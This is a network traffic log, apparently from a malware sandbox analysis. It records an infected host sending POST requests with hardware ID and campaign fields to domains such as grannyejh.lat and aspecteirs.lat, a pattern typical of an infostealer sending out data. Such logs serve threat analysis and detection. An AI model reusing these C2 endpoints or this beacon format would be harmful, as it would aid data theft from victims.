2024-12-19 09:13:15 UTC	1117	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:13:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=l3nqks8c7spbr93htfmkengl4n; expires=Mon, 14 Apr 2025 02:59:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ky71Rnl6ry5SwvJ1Zti4B0ypmsA0ZOps0YwMcMu5yJ9T8Tro59kSjFRicxMSdhGjIQ0V5AYeCDRiyO2NorgLvK0WJ8nvJZfOUvx4TG0sMICiuqpUWhYKI%2F4%2FcDDhrgbZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4646401b2d72c2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1799&min_rtt=1790&rtt_var=689&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=944&delivery_rate=1568206&cwnd=164&unsent_bytes=0&cid=20ff478677cf56d1&ts=12565&x=0"
2024-12-19 09:13:15 UTC	252	IN	Data Raw: 34 39 31 63 0d 0a 75 61 4e 32 68 77 6c 55 74 79 52 2f 4e 56 35 57 43 43 2b 41 45 66 68 34 7a 71 52 31 77 4f 31 4d 7a 71 42 46 6d 4f 44 6d 48 2b 66 43 67 51 43 6c 4d 32 43 62 42 67 78 51 66 47 78 38 58 66 56 30 31 46 71 76 77 46 66 36 69 79 32 69 30 79 43 30 77 70 42 79 78 59 50 46 46 2b 74 36 4d 5a 73 47 47 6b 31 38 62 46 4e 55 6f 6e 53 57 57 76 53 47 45 4b 71 50 4c 61 4c 43 4a 50 4f 50 6c 6e 4f 45 30 63 38 52 37 32 77 33 30 30 55 54 57 44 73 7a 62 55 37 71 66 35 45 56 70 73 6c 58 37 4d 38 70 74 49 4a 2f 75 71 32 44 61 34 62 30 77 67 58 73 4b 79 6d 62 58 31 31 51 4d 48 51 79 44 65 46 30 6d 68 53 6f 77 42 36 6f 68 53 53 71 77 79 48 79 6b 49 39 35 6a 39 48 42 45 75 35 6d 50 73 64 49 47 56 38 77 4e 57 64 4f 6f 6a 33 61 48 62 53 47 54 2b 4c 63 48 4b Data Ascii: 491cuaN2hwlUtyR/NV5WCC+AEfh4zqR1wO1MzqBFmODmH+fCgQClM2CbBgxQfGx8XfV01FqvwFf6iy2i0yC0wpByxYPFF+t6MZsGGk18bFNUonSWWvSGEKqPLaLCJPOPlnOE0c8R72w300UTWDszbU7qf5EVpslX7M8ptIJ/uq2Da4b0wgXsKymbX11QMHQyDeF0mhSowB6ohSSqwyHykI95j9HBEu5mPsdIGV8wNWdOoj3aHbSGT+LcHK
2024-12-19 09:13:15 UTC	1369	IN	Data Raw: 2f 54 4e 75 2b 50 6c 48 76 46 78 49 38 4e 70 57 77 36 6c 52 35 64 58 7a 41 36 62 30 37 74 64 4a 73 61 76 73 6b 58 6f 59 63 6d 71 4d 67 6f 39 59 32 4b 64 34 4c 54 79 42 50 71 62 44 37 54 53 52 34 58 63 6e 52 74 56 61 49 72 32 6a 71 38 78 52 53 32 67 6a 2f 73 33 57 6e 6a 77 6f 4e 78 78 59 4f 42 45 75 74 71 4f 39 56 55 46 56 77 33 4d 58 68 47 36 33 36 58 47 71 48 4d 47 4b 47 50 4b 61 62 49 4b 50 43 47 69 58 43 44 32 38 46 55 71 79 73 78 7a 51 5a 46 46 78 38 78 65 6b 72 75 5a 64 67 67 37 4e 6c 5a 75 38 38 70 6f 49 4a 2f 75 6f 71 42 66 6f 62 51 7a 68 66 74 59 43 54 56 56 42 74 61 4f 53 5a 73 53 4f 78 35 6d 51 69 6d 79 42 47 68 68 69 57 6c 78 79 44 2b 77 73 6f 39 67 73 4f 42 54 4b 56 4b 4f 39 35 4b 46 30 41 38 64 48 55 44 2b 7a 4f 64 46 75 79 65 56 36 61 4f 4b Data Ascii: /TNu+PlHvFxI8NpWw6lR5dXzA6b07tdJsavskXoYcmqMgo9Y2Kd4LTyBPqbD7TSR4XcnRtVaIr2jq8xRS2gj/s3WnjwoNxxYOBEutqO9VUFVw3MXhG636XGqHMGKGPKabIKPCGiXCD28FUqysxzQZFFx8xekruZdgg7NlZu88poIJ/uoqBfobQzhftYCTVVBtaOSZsSOx5mQimyBGhhiWlxyD+wso9gsOBTKVKO95KF0A8dHUD+zOdFuyeV6aOK
2024-12-19 09:13:15 UTC	1369	IN	Data Raw: 39 6d 73 51 6c 78 66 48 43 41 4f 5a 68 64 4f 42 46 45 31 6b 37 49 69 70 53 72 47 72 61 48 61 43 47 54 2b 4b 43 4c 36 54 45 4e 66 57 50 68 33 4f 4c 31 4d 51 62 37 57 73 32 32 45 4d 5a 58 44 63 33 5a 30 6e 77 65 5a 6f 53 71 63 63 64 71 4d 39 67 37 4d 55 2f 75 74 72 45 54 4a 4c 51 67 79 48 6d 5a 54 6a 53 55 46 31 49 63 69 30 71 53 75 34 7a 77 6c 71 68 7a 68 4b 6e 67 43 2b 6d 7a 43 4c 77 6a 6f 78 7a 68 73 6e 4f 45 4f 56 6e 50 74 39 4c 45 31 4d 30 50 57 46 47 35 48 4f 62 45 4f 79 49 56 36 57 58 62 76 53 43 45 2f 32 4f 69 58 4c 48 37 73 49 61 36 32 77 67 6c 56 6c 54 54 6e 77 7a 5a 67 32 36 4d 35 59 54 72 4d 30 64 70 6f 38 70 6f 63 63 6b 2f 59 47 4a 65 6f 2f 56 78 68 44 70 59 6a 76 54 52 68 70 54 4f 53 5a 76 52 4f 35 2f 32 6c 54 73 77 51 2f 69 31 32 36 44 78 54 Data Ascii: 9msQlxfHCAOZhdOBFE1k7IipSrGraHaCGT+KCL6TENfWPh3OL1MQb7Ws22EMZXDc3Z0nweZoSqccdqM9g7MU/utrETJLQgyHmZTjSUF1Ici0qSu4zwlqhzhKngC+mzCLwjoxzhsnOEOVnPt9LE1M0PWFG5HObEOyIV6WXbvSCE/2OiXLH7sIa62wglVlTTnwzZg26M5YTrM0dpo8pocck/YGJeo/VxhDpYjvTRhpTOSZvRO5/2lTswQ/i126DxT
2024-12-19 09:13:15 UTC	1369	IN	Data Raw: 64 49 7a 4a 7a 78 72 73 5a 6a 44 64 51 52 4e 61 4e 7a 4a 68 53 75 56 31 6c 78 4b 68 77 78 53 6a 69 79 53 2b 77 53 7a 77 6a 34 34 39 79 35 76 47 44 4b 55 7a 64 76 4a 4b 4e 45 63 6e 4a 6e 77 4e 2f 54 32 44 57 71 76 4b 56 2f 72 50 4c 61 50 4c 4b 50 4b 4b 69 33 4b 42 31 63 63 53 36 47 34 35 33 31 51 56 57 54 45 2f 5a 55 62 77 63 35 63 65 6f 4d 49 66 71 59 56 75 34 6f 49 67 34 73 4c 63 50 62 44 57 7a 68 54 6d 66 58 62 4b 43 41 51 58 4f 7a 67 71 46 61 4a 2f 6c 42 71 6a 79 68 75 70 68 79 2b 67 7a 43 44 2f 69 34 78 31 6c 39 72 46 48 4f 52 6c 4f 64 52 43 47 46 49 34 4d 32 35 4c 37 54 50 55 57 71 76 65 56 2f 72 50 41 59 76 33 5a 64 75 34 78 47 4c 4c 77 6f 45 54 36 53 74 75 6c 55 6f 65 57 7a 51 37 62 45 54 75 65 5a 4d 52 6f 4d 30 54 72 6f 59 72 71 73 4d 69 2f 34 4f Data Ascii: dIzJzxrsZjDdQRNaNzJhSuV1lxKhwxSjiyS+wSzwj449y5vGDKUzdvJKNEcnJnwN/T2DWqvKV/rPLaPLKPKKi3KB1ccS6G4531QVWTE/ZUbwc5ceoMIfqYVu4oIg4sLcPbDWzhTmfXbKCAQXOzgqFaJ/lBqjyhuphy+gzCD/i4x1l9rFHORlOdRCGFI4M25L7TPUWqveV/rPAYv3Zdu4xGLLwoET6StulUoeWzQ7bETueZMRoM0TroYrqsMi/4O
2024-12-19 09:13:15 UTC	1369	IN	Data Raw: 63 38 5a 36 6d 4d 2b 33 45 63 5a 55 6a 45 79 5a 6b 66 6a 64 4a 51 55 70 49 5a 5a 34 6f 67 32 37 4a 70 6e 32 35 4b 66 62 35 50 57 34 42 6e 71 4b 79 6d 62 58 31 31 51 4d 48 51 79 44 65 74 68 6e 68 65 2b 7a 78 43 73 67 43 32 2b 77 79 72 78 6b 49 4e 79 67 64 7a 4e 45 75 70 74 4e 39 42 4d 45 56 41 35 50 32 56 42 6f 6a 33 61 48 62 53 47 54 2b 4b 68 4a 62 2f 56 4a 50 53 4a 6b 6d 62 46 78 49 38 4e 70 57 77 36 6c 52 35 64 56 44 63 2f 62 6b 33 75 63 35 34 58 72 4e 51 59 70 59 67 6e 70 39 41 74 2f 59 57 50 64 59 37 55 78 77 62 70 5a 53 54 51 56 41 38 58 63 6e 52 74 56 61 49 72 32 69 79 72 31 67 65 68 7a 52 2b 36 77 54 48 78 6a 34 67 39 6d 70 58 59 56 4f 4a 6e 64 6f 30 47 47 31 67 31 4e 32 56 4d 36 33 2b 58 48 36 58 44 46 71 53 4c 4a 4b 62 43 49 66 79 44 67 58 65 47 Data Ascii: c8Z6mM+3EcZUjEyZkfjdJQUpIZZ4og27Jpn25Kfb5PW4BnqKymbX11QMHQyDethnhe+zxCsgC2+wyrxkINygdzNEuptN9BMEVA5P2VBoj3aHbSGT+KhJb/VJPSJkmbFxI8NpWw6lR5dVDc/bk3uc54XrNQYpYgnp9At/YWPdY7UxwbpZSTQVA8XcnRtVaIr2iyr1gehzR+6wTHxj4g9mpXYVOJndo0GG1g1N2VM63+XH6XDFqSLJKbCIfyDgXeG
2024-12-19 09:13:15 UTC	1369	IN	Data Raw: 55 7a 64 74 5a 42 48 6c 59 32 50 57 5a 43 35 58 65 49 45 4b 76 55 46 71 4f 45 49 36 44 43 4b 76 65 49 68 58 53 49 31 38 77 54 34 6d 51 7a 6c 51 68 64 55 43 52 30 4d 67 33 44 66 70 45 57 39 35 78 58 76 63 45 33 37 4d 55 72 75 74 72 45 66 59 2f 65 79 78 6e 6d 5a 44 58 48 52 78 74 46 50 44 6c 67 58 2b 68 34 6e 78 65 68 79 78 53 6b 69 53 57 67 30 43 37 36 67 59 38 39 79 35 76 47 44 4b 55 7a 64 76 5a 52 43 31 30 37 4f 48 78 47 34 33 43 4d 46 37 79 47 57 65 4b 65 4b 62 32 43 66 2b 79 53 6b 33 71 61 6c 64 68 55 34 6d 64 32 6a 51 59 62 58 6a 6f 7a 62 45 50 77 64 70 77 56 6f 38 38 65 70 6f 63 74 72 4d 59 6a 2f 59 65 48 63 59 37 63 77 68 76 68 59 6a 6a 63 53 56 30 5a 66 44 4e 79 44 62 6f 7a 75 77 47 76 79 68 72 69 6b 47 43 31 67 69 44 32 77 74 77 39 69 64 58 45 46 Data Ascii: UzdtZBHlY2PWZC5XeIEKvUFqOEI6DCKveIhXSI18wT4mQzlQhdUCR0Mg3DfpEW95xXvcE37MUrutrEfY/eyxnmZDXHRxtFPDlgX+h4nxehyxSkiSWg0C76gY89y5vGDKUzdvZRC107OHxG43CMF7yGWeKeKb2Cf+ySk3qaldhU4md2jQYbXjozbEPwdpwVo88epoctrMYj/YeHcY7cwhvhYjjcSV0ZfDNyDbozuwGvyhrikGC1giD2wtw9idXEF
2024-12-19 09:13:15 UTC	1369	IN	Data Raw: 53 55 46 39 69 50 7a 70 6b 53 76 51 7a 68 53 58 69 68 68 69 34 7a 33 61 56 32 32 66 39 6a 73 51 6c 78 63 37 47 46 4f 4a 78 49 4e 4a 4b 44 46 77 78 4f 45 68 43 35 57 57 5a 46 61 2f 58 48 75 36 45 49 2b 79 4d 5a 2f 32 61 78 43 58 46 39 4d 59 43 35 6b 51 31 78 45 39 64 47 58 77 7a 66 41 32 36 4d 36 52 61 76 73 55 48 6f 59 41 2f 6b 6f 4a 2f 34 37 7a 45 64 70 50 63 30 52 66 7a 59 44 76 5a 56 79 4d 58 5a 47 41 34 48 37 41 68 79 41 58 73 32 53 6a 73 7a 79 2f 73 6d 68 37 6a 77 70 49 39 33 59 6d 50 56 50 63 72 62 70 55 42 48 6b 55 75 4d 6d 6c 62 34 54 53 6b 4a 49 76 51 48 61 57 66 4b 62 76 4e 5a 37 54 43 69 7a 33 64 34 6f 45 64 34 6e 41 6e 77 30 73 4e 55 48 77 4c 4a 41 33 36 4d 38 4a 61 6d 63 55 5a 72 49 67 34 76 59 38 41 37 49 69 44 62 59 4c 4d 7a 6c 53 72 4b 7a Data Ascii: SUF9iPzpkSvQzhSXihhi4z3aV22f9jsQlxc7GFOJxINJKDFwxOEhC5WWZFa/XHu6EI+yMZ/2axCXF9MYC5kQ1xE9dGXwzfA26M6RavsUHoYA/koJ/47zEdpPc0RfzYDvZVyMXZGA4H7AhyAXs2Sjszy/smh7jwpI93YmPVPcrbpUBHkUuMmlb4TSkJIvQHaWfKbvNZ7TCiz3d4oEd4nAnw0sNUHwLJA36M8JamcUZrIg4vY8A7IiDbYLMzlSrKz
2024-12-19 09:13:15 UTC	1369	IN	Data Raw: 52 79 6f 76 4a 6b 58 68 61 59 41 6b 6b 75 30 62 70 49 67 30 71 38 51 42 32 73 4c 4b 50 59 71 62 6d 53 32 6c 49 33 62 71 43 46 31 50 66 47 77 71 65 4f 46 39 6c 42 32 36 31 31 71 4b 72 42 53 57 67 41 76 39 6c 38 5a 4a 67 73 76 51 48 2b 68 6e 64 70 73 47 47 78 64 6b 5a 43 51 4e 35 6d 4c 61 51 76 79 55 54 50 66 63 65 66 79 51 4f 4c 53 62 78 47 76 46 67 35 4e 61 70 58 6c 32 6a 51 5a 61 56 43 34 6d 62 45 37 30 63 4e 30 6b 6b 75 45 5a 70 59 34 34 76 4e 55 6f 78 4c 79 52 66 6f 76 56 78 67 4c 30 4b 33 69 56 53 56 30 50 42 58 51 69 44 64 30 39 32 67 4c 73 6e 6c 65 58 6a 43 43 69 78 54 48 72 7a 36 4e 7a 67 74 72 58 42 50 4a 6b 64 70 73 47 47 78 64 6b 5a 69 51 4e 35 6d 4c 61 51 76 79 55 54 50 66 63 65 66 79 51 4f 4c 53 62 78 47 76 46 67 35 4e 61 70 58 6c 32 6a 51 5a Data Ascii: RyovJkXhaYAkku0bpIg0q8QB2sLKPYqbmS2lI3bqCF1PfGwqeOF9lB2611qKrBSWgAv9l8ZJgsvQH+hndpsGGxdkZCQN5mLaQvyUTPfcefyQOLSbxGvFg5NapXl2jQZaVC4mbE70cN0kkuEZpY44vNUoxLyRfovVxgL0K3iVSV0PBXQiDd092gLsnleXjCCixTHrz6NzgtrXBPJkdpsGGxdkZiQN5mLaQvyUTPfcefyQOLSbxGvFg5NapXl2jQZ
2024-12-19 09:13:15 UTC	1369	IN	Data Raw: 43 51 4e 37 6a 50 43 57 71 33 4d 42 36 2b 41 4b 65 44 46 50 66 33 43 79 6a 32 4c 6d 35 6c 55 35 47 45 6d 32 45 6b 61 47 7a 6f 36 5a 41 33 39 50 59 4e 61 75 6f 5a 50 38 63 46 75 76 6f 4a 2f 75 73 57 48 62 35 66 64 77 67 4c 6d 4c 41 6a 72 61 77 39 51 4c 44 63 6f 66 4f 39 33 6a 41 2b 76 31 68 43 63 73 51 4f 2b 78 54 66 35 77 4c 56 72 68 74 76 50 45 36 55 6c 64 73 30 47 52 52 63 52 4a 6d 31 64 34 54 50 55 57 71 43 47 54 2b 4b 43 50 4b 76 53 4a 4c 61 46 6e 6e 72 46 78 49 38 4e 70 58 31 32 6a 52 56 54 46 79 35 30 4d 67 32 6c 66 5a 63 62 72 38 67 55 73 4a 30 6f 72 39 51 6b 76 62 79 36 55 4a 66 63 30 52 65 6e 57 6a 76 52 55 41 68 55 4c 44 4e 55 63 38 39 68 6e 51 71 76 68 44 75 6c 67 69 4b 53 2f 42 44 72 68 5a 51 2f 6f 39 6a 58 46 36 55 6c 64 73 30 47 52 52 63 52 Data Ascii: CQN7jPCWq3MB6+AKeDFPf3Cyj2Lm5lU5GEm2EkaGzo6ZA39PYNauoZP8cFuvoJ/usWHb5fdwgLmLAjraw9QLDcofO93jA+v1hCcsQO+xTf5wLVrhtvPE6Ulds0GRRcRJm1d4TPUWqCGT+KCPKvSJLaFnnrFxI8NpX12jRVTFy50Mg2lfZcbr8gUsJ0or9Qkvby6UJfc0RenWjvRUAhULDNUc89hnQqvhDulgiKS/BDrhZQ/o9jXF6Ulds0GRRcR

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.6	50267	172.67.177.88	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:13:10 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=A8BVR3H3LCEZ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1301 Host: cheapptaxysu.click
2024-12-19 09:13:10 UTC	1301	OUT	Data Raw: 2d 2d 41 38 42 56 52 33 48 33 4c 43 45 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 41 38 42 56 52 33 48 33 4c 43 45 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 41 38 42 56 52 33 48 33 4c 43 45 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 0d 0a 2d 2d 41 38 42 56 52 33 48 33 4c 43 45 5a 0d 0a 43 6f 6e 74 65 Data Ascii: --A8BVR3H3LCEZContent-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--A8BVR3H3LCEZContent-Disposition: form-data; name="pid"1--A8BVR3H3LCEZContent-Disposition: form-data; name="lid"CZJvss----A8BVR3H3LCEZConte
2024-12-19 09:13:25 UTC	1134	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:13:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=sidni4sht082vrk516p10gg896; expires=Mon, 14 Apr 2025 02:59:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=acFHZlC06HDJO%2FPlVmdfY4jltkT4%2FQgj3rUDnMGC8h%2F6J6f0tSrH%2FQP02Wc4hOOB6GVALv7zlRH5LmL0aZOeA8uSu2nGCv4eqID9Jm%2BrYi5evdmWBZ4ydkeOUC9A51X2NqZTymQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4646747d45c44a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1480&min_rtt=1475&rtt_var=564&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=2214&delivery_rate=1921052&cwnd=228&unsent_bytes=0&cid=185c875a03daa93b&ts=14408&x=0"
2024-12-19 09:13:25 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:13:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.6	50268	104.21.66.85	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:13:10 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=IFHV0SJEJA0L8TR User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12844 Host: aspecteirs.lat
2024-12-19 09:13:10 UTC	12844	OUT	Data Raw: 2d 2d 49 46 48 56 30 53 4a 45 4a 41 30 4c 38 54 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 49 46 48 56 30 53 4a 45 4a 41 30 4c 38 54 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 49 46 48 56 30 53 4a 45 4a 41 30 4c 38 54 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 56 6d 72 30 74 2d 2d 69 6e 73 74 61 6c 6c 73 0d 0a 2d 2d 49 46 Data Ascii: --IFHV0SJEJA0L8TRContent-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--IFHV0SJEJA0L8TRContent-Disposition: form-data; name="pid"2--IFHV0SJEJA0L8TRContent-Disposition: form-data; name="lid"CVmr0t--installs--IF
2024-12-19 09:13:25 UTC	1133	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:13:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=dg9tvsprduvdu9fqpm04rpl5ni; expires=Mon, 14 Apr 2025 02:59:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6yJb0i2oYp1Pd9Ny%2F5TXScW1iHWU01xWketSLFuDDUPC%2FI47vnWq5oDKr75RFGTbhnktpBFKZBEHJXC7lKZGWNNJHmLU33MT2iQ45uBQSztobLrSQWJZa2%2F2cyjq6%2BstgA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f46467498ef423b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2071&min_rtt=2068&rtt_var=783&sent=12&recv=17&lost=0&retrans=0&sent_bytes=2832&recv_bytes=13779&delivery_rate=1391801&cwnd=226&unsent_bytes=0&cid=6c2c8db185696b4e&ts=14238&x=0"
2024-12-19 09:13:25 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:13:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.6	50269	172.67.179.109	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:13:12 UTC	268	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=5GSSYDER User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1287 Host: grannyejh.lat
2024-12-19 09:13:12 UTC	1287	OUT	Data Raw: 2d 2d 35 47 53 53 59 44 45 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 35 47 53 53 59 44 45 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 47 53 53 59 44 45 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 38 39 37 38 33 33 37 30 0d 0a 2d 2d 35 47 53 53 59 44 45 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 Data Ascii: --5GSSYDERContent-Disposition: form-data; name="hwid"86648A4BEF1E4DA300D57F9DDD37BE0C--5GSSYDERContent-Disposition: form-data; name="pid"1--5GSSYDERContent-Disposition: form-data; name="lid"yau6Na--6989783370--5GSSYDERContent-Dis
2024-12-19 09:13:27 UTC	1122	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:13:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=o729lt13othiuatgjpa2im8g74; expires=Mon, 14 Apr 2025 02:59:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3vtfkQLNALF%2Fy2AwM8ni4%2FpGrwC1gi3UtpkuILUKbTKsrg5gFwfGLHs3ytcqYQhvSBZERogYJJL5t2mayzpO8zEqSzhqVKtOeeeh2as%2F%2BLHDdEfdRu1GMtmDD6IKORPT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f46467f1ebe0cbc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1723&min_rtt=1702&rtt_var=653&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=2191&delivery_rate=1715628&cwnd=175&unsent_bytes=0&cid=7e85930663c2d5a4&ts=14411&x=0"
2024-12-19 09:13:27 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:13:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
55	192.168.2.6	50272	172.67.179.109	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:13:16 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=WU2670ZFK75MEGQ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12841 Host: grannyejh.lat
2024-12-19 09:13:16 UTC	12841	OUT	Data Raw: 2d 2d 57 55 32 36 37 30 5a 46 4b 37 35 4d 45 47 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 57 55 32 36 37 30 5a 46 4b 37 35 4d 45 47 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 55 32 36 37 30 5a 46 4b 37 35 4d 45 47 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 57 55 32 36 37 Data Ascii: --WU2670ZFK75MEGQContent-Disposition: form-data; 